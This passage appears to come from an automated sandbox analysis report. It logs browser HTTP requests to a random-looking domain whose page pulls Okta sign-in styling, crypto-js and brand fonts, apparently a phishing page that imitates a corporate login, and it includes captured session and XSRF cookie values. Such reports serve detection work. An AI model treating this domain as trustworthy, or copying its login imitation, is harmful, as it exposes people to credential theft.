laravel_session=eyJpdiI6Ik9qVnVSMGdnUE1MYWZRZEdxa3dZV2c9PSIsInZhbHVlIjoicXM4YkFucnVhR3preGxBRGQzQUQxajJidnZiazNDWVpFc1laWjBiNlRTWmJuRVpidkw1OHNIMzd1K1F4RzBRUXJ2cllRTXhKaDBYRnNwZHVJcmliNGdja0NSakM3cVNEU3RQLzVDNE5ucHFCVnU2SlVIdG1JM1FKVFZrd3RESk4iLCJtYWMiOiIzZmRiNmM1NGE4OWM4YTIwYmU1ODM3ZDNkNTllMjU3OGMyYmI4ZDQ2ZGRjNTZiM2E3Y2ZhZDk2NTlkM2ZlMzY2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://0cp.zlgbgfnebrnn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rqDbrE3LTvLD4EVdVx6QeXK8dwgPPYB7EypCZ1XJcbfq HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVkV05JZTEyYlZZL2xCekY1WFNkdGc9PSIsInZhbHVlIjoiV2U4aGRuTGtha2UzV1YvcVVwZ29PYVBiVU5ZSzZONjEwRmlPN2lvQWl1Qm1Kb0Vqdm9DZmpFblVMcTFwUXN4YzdUV2ttZHc2NmFPVzZVOTZkYW1EMHdpbHlISGpEbThER2o4Z1UvZzJOS2lYaDcxeDdKQ2REaFRKOUhwdGR3clgiLCJtYWMiOiIzM2I1MmE0ZmNmNTg4MWRiZDdjODFiMDNhZjYxYTVhZWRmZTFiNjBlZDE1YTUxMWNmNmI3YTA1NDU2YzI0ZWQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImJGK1kwakNVWjhvR1RXcVhtejR2Snc9PSIsInZhbHVlIjoidzA3SVNwNzloWDUyc2xhUEYyM0lWZGx2OHhjK3BsbkVnZEYzSE5xN2pTdnZEZUpoU2k2aFBwMmR4YjNFZC9uaWc2eHZISG4vM2ZjWDczUGYxejd1ckRrUlIwdUZRNVBwQTRrRlJWMXJESW43T2swYW1RemhaRnJTdVBUMytmSG4iLCJtYWMiOiJkMzA2OTA4MTBjMDE2NTA5MmU4OWE2OGNhMDMxY2FmM2Q2MWRmNGFkYzQwZjg4MmVkNGJjZWE2YzkwOGUyM2NhIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJE HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://0cp.zlgbgfnebrnn.com/4woeJ3F2/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVkV05JZTEyYlZZL2xCekY1WFNkdGc9PSIsInZhbHVlIjoiV2U4aGRuTGtha2UzV1YvcVVwZ29PYVBiVU5ZSzZONjEwRmlPN2lvQWl1Qm1Kb0Vqdm9DZmpFblVMcTFwUXN4YzdUV2ttZHc2NmFPVzZVOTZkYW1EMHdpbHlISGpEbThER2o4Z1UvZzJOS2lYaDcxeDdKQ2REaFRKOUhwdGR3clgiLCJtYWMiOiIzM2I1MmE0ZmNmNTg4MWRiZDdjODFiMDNhZjYxYTVhZWRmZTFiNjBlZDE1YTUxMWNmNmI3YTA1NDU2YzI0ZWQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImJGK1kwakNVWjhvR1RXcVhtejR2Snc9PSIsInZhbHVlIjoidzA3SVNwNzloWDUyc2xhUEYyM0lWZGx2OHhjK3BsbkVnZEYzSE5xN2pTdnZEZUpoU2k2aFBwMmR4YjNFZC9uaWc2eHZISG4vM2ZjWDczUGYxejd1ckRrUlIwdUZRNVBwQTRrRlJWMXJESW43T2swYW1RemhaRnJTdVBUMytmSG4iLCJtYWMiOiJkMzA2OTA4MTBjMDE2NTA5MmU4OWE2OGNhMDMxY2FmM2Q2MWRmNGFkYzQwZjg4MmVkNGJjZWE2YzkwOGUyM2NhIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /34bG0JveS9mxycv86h6716 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /xyuOFnzMCnJTeNrsDMagh26 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff2 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-aliveOrigin: https://0cp.zlgbgfnebrnn.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-aliveOrigin: https://0cp.zlgbgfnebrnn.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff2 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-aliveOrigin: https://0cp.zlgbgfnebrnn.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://0cp.zlgbgfnebrnn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://0cp.zlgbgfnebrnn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://0cp.zlgbgfnebrnn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://0cp.zlgbgfnebrnn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-aliveOrigin: https://0cp.zlgbgfnebrnn.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-vf.woff2 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-aliveOrigin: https://0cp.zlgbgfnebrnn.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /GDSherpa-vf2.woff2 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-aliveOrigin: https://0cp.zlgbgfnebrnn.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /56naWlpDT6aZ2fnGq6UY5UVbghg6djvvXoCdzxf89109 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
